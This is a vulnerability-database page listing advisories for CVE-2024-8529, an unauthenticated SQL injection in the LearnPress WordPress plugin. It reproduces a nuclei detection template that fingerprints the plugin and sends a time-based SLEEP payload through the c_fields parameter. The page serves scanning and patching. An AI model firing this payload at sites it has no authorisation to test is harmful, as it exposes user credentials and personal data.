Lucene search
+L

LearnPress < 4.2.7.1 - SQL Injection

🗓️ 09 Sep 2026 02:52:56Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 53 Views

LearnPress versions before 4.2.7.1 are vulnerable to unauthenticated SQL injection attacks.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2024-8529
12 Sep 202411:51
circl
cnnvd
CNNVD
WordPress plugin LearnPress SQL注入漏洞
12 Sep 202400:00
cnnvd
cve
CVE
CVE-2024-8529
12 Sep 202408:30
cve
cvelist
Cvelist
CVE-2024-8529 LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_fields'
12 Sep 202408:30
cvelist
githubexploit
GithubExploit
Exploit for SQL Injection in Thimpress Learnpress
12 Oct 202420:52
githubexploit
kitploit
Kitploit
CVE-2024-8529
9 Sep 202611:40
kitploit
metasploit
Metasploit
WordPress LearnPress Unauthenticated SQLi (CVE-2024-8522, CVE-2024-8529)
11 Sep 202400:00
metasploit
nvd
NVD
CVE-2024-8529
12 Sep 202409:15
nvd
osv
OSV
CVE-2024-8529
12 Sep 202409:15
osv
patchstack
Patchstack
WordPress LearnPress Plugin <= 4.2.7 is vulnerable to SQL Injection
12 Sep 202400:00
patchstack
Rows per page
id: CVE-2024-8529

info:
  name: LearnPress < 4.2.7.1 - SQL Injection
  author: ritikchaddha,iacker
  severity: critical
  description: |
    The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can exploit SQL injection through the c_fields parameter to extract sensitive database information including user credentials, course data, and personal information from the LearnPress LMS.
  remediation: |
    Update the LearnPress plugin to version 4.2.7.1 or later.
  reference:
    - https://wpscan.com/vulnerability/6b86c089-177b-45b4-979e-4ae08e586e83/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8529
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-8529
    cwe-id: CWE-89
    epss-score: 0.11831
    epss-percentile: 0.95812
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="wp-content/plugins/learnpress"
    vendor: thimpress
    product: learnpress
  tags: cve,cve2024,wordpress,wp-plugin,wp,learnpress,sqli,time-based-sqli,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/learnpress/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "LearnPress", "WordPress LMS Plugin")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(8)))a)/*{{randstr}}*/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=8'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 490a00463044022040476432964f0bc1787c4e6c92cba87bd38e43aa9db9bb3e709d673dbb81356402200a74705f348811a22116aec3007c714bbfe83fd35c66005795aea0f6caa8adf2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.17.5 - 10
EPSS0.11831
SSVC
53